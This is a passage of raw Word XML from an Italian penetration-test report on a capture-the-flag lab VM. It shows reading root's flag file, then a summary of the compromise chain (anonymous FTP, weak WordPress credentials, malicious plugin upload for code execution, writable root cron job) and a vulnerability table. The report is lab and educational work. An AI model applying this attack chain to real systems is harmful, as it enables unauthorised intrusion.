            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cd /root</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /root/flag.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="4486275"/>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33400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60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando ha restituito il contenuto del file flag.txt, messaggio di conferma predisposto dagli autori della macchina target a validazione del raggiungimento dei privilegi massimi sul sistema:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table30"/>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90"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9390"/>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101">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Congratulations!</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">If you can read this, that means you were able to obtain root permissions on this VM.</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">You should be proud!</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">There are multiple ways to gain access remotely, as well as for privilege escalation.</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Did you find them all?</w:t>
            </w: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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">@abatchy17</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'acquisizione della flag conferma il pieno successo dell'attività di penetration testing: a partire da un accesso privo di credenziali (black-box), è stato possibile ricostruire l'intera catena di compromissione — enumerazione dei servizi, sfruttamento di un accesso FTP anonimo, individuazione di un'installazione WordPress non protetta, compromissione di credenziali deboli, esecuzione di codice remoto tramite upload di plugin malevolo, e infine escalation dei privilegi tramite un cron job insicuro — fino all'ottenimento del controllo completo (root) sul sistema target. Il messaggio finale conferma inoltre l'esistenza di percorsi di attacco alternativi non esplorati nel presente test, aspetto da tenere in considerazione nella valutazione complessiva della postura di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Risultati ottenuti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Sintesi delle vulnerabilità individuate</w:t>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600"/>
        <w:gridCol w:w="3100"/>
        <w:gridCol w:w="1826"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="500"/>
            <w:gridCol w:w="3600"/>
            <w:gridCol w:w="3100"/>
            <w:gridCol w:w="18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10E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserv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0F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilità</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10">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Servizio/Componente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Severità</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12">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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13">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Accesso FTP anonimo abilitato con esposizione di file sensibili</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14">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.5 (porta 21)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15">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="bf8f00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</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116">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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17">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Percorso applicativo sensibile scoperto tramite robots.txt</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18">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache HTTP Server (porta 80)</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19">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="bf8f00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bassa</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1A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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1B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CMS WordPress obsoleto (v4.5) con tema non aggiornato</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1C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">backup_wordpress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1D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="bf8f00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</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11E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</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1F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint XML-RPC abilitato, sfruttabile per attacchi a dizionario</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20">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WordPress xmlrpc.php</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21">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="e36c09"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</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22">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</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23">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenziali amministrative deboli (john / enigma)</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24">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WordPress — utente john (Administrator)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25">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critica</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126">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6</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27">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Possibilità di upload plugin arbitrari con conseguente RCE</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28">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pannello wp-admin</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29">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critica</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2A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7</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2B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cron job root con file/percorso scrivibile da utenza non privilegiata</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2C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/local/bin/cleanup</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2D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critica</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12E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8</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2F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Software di sistema obsoleto (Apache 2.2.22, PHP 5.3.10, kernel datato)</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30">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</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31">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="e36c09"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Fasi dell'attività completate</w:t>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126"/>
        <w:gridCol w:w="1700"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="6126"/>
            <w:gridCol w:w="170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134">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fase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35">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Descrizione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36">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Esito</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37">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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38">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ricognizione e scansione dei servizi di rete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39">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</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13A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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3B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerazione applicazione web e servizi ausiliari</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3C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</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3D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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3E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ottenimento accesso iniziale (www-data)</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3F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
